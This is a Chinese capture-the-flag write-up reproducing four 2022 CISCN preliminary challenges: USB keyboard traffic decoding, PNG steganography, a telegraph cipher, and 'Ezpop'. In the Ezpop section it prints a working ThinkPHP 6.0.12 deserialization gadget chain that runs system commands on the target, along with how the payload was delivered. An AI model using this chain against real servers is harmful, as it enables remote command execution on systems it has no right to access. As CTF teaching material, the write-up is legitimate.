ez_usb
刚开始直接提取usb键盘流量,发现导出有问题
键盘流量,搜索8个字节长度的数据包,这里也能发现版本有2.8.1和2.10.1两种,因此猜测需要分别导出
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-1.png)
tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.8.1"' -T fields -e usb.capdata > 1.txt
tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.10.1"' -T fields -e usb.capdata > 2.txt
提取出两段数据
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-2.png)
然后拿脚本去解键盘流量,分别得到数据如下
output: 526172211a0700Cf907300000d00000000000000c4527424943500300000002A00000002b9f9b0530778b5541d33080020000000666c61672E747874B9Ba013242f3aFC000b092c229d6e994167c05A78708b271fFC042ae3d251e65536F9Ada87c77406b67d0E6316684766a86e844dC81AA2c72c71348d10c43D7B00400700
output :35c535765e50074a第一个数据用010保存16进制文件,得到一个rar文件
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-3.png)
第二个数据就是密码
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-4.png)
everlasting_night
仔细观察png数据块,通道隐藏的数据可以配合lsb隐写
PNG文件尾后面的16进制数据,是md5
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-5.png)
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-6.png)
ohhWh04m1
stegslove打开翻通道,A2通道有信息
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-7.png)
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-8.png)
f78dcd383f1b574b
lsb隐写脚本可以分离出东西 , f78dcd383f1b574b是密码
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-9.png)
提取出来out文件,需要密码,就是ohhWh04m1
解出来是个损坏的png,看wp有个工具gimp
需要重名名为data文件
gimp flag.data![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-10.png)
签到电台
在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。
发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。
(如果您还需要进一步的提示,可在本公众号输入“豪密剖析”获取。)
“弼时安全到达了”所对应的7个电码:1732 2514 1344 0356 0451 6671 0055
模十算法示例:1732与6378得到7000
发包示例:/send?msg=s
a = '99643341808268586836775501600817585713493257766561476063601867596343105374607456471099628834298182339040868150740' \
'9511612238587443601660278684275641000975730184165996600423556460848669900431897229857720894775658109911874842297207211' \
'874555613481342526489469108931355995699901993003656750839977460316073816952542983844454554912374637487610435202414085664' \
'59011252194284601222413675885829671754541410117754160428719487295645115327768288544685069742397764022225956726271320557630' \
'43102657536225660163856239886863333649499474893205993474'[:28]
b = '1732251413440356045166710055'
res = ''
for i in range(28):
tmp = (int(a[i]) + int(b[i])) % 10
res += str(tmp)
print(res)跟据提示脚本算出密文,然后根据session发包
Ezpop
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-11.png)
www.zip 源码泄露
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-12.png)
在index.php下的index类中的test方法找到路由
寻找网上的链子
ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户
<?php
namespace think {
abstract class Model
{
private $lazySave = false;
private $data = [];
private $exists = false;
protected $table;
private $withAttr = [];
protected $json = [];
protected $jsonAssoc = false;
function __construct($obj = '')
{
$this->lazySave = True;
$this->data = ['whoami' => ['dir /']];
$this->exists = True;
$this->table = $obj;
$this->withAttr = ['whoami' => ['system']];
$this->json = ['whoami', ['whoami']];
$this->jsonAssoc = True;
}
}
}
namespace think\model {
use think\Model;
class Pivot extends Model
{
}
}
namespace {
echo (urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
利用poc生成payload
然后在正确路径下打
![[2022CISCN]初赛 复现](https://imgs.yssmx.com/Uploads/2023/06/472713-13.png)
文章来源:https://www.toymoban.com/news/detail-472713.html
修改命令 获得flag文章来源地址https://www.toymoban.com/news/detail-472713.html
到了这里,关于[2022CISCN]初赛 复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[蓝帽杯 2022 初赛]domainhacker](https://imgs.yssmx.com/Uploads/2024/02/672274-1.png)
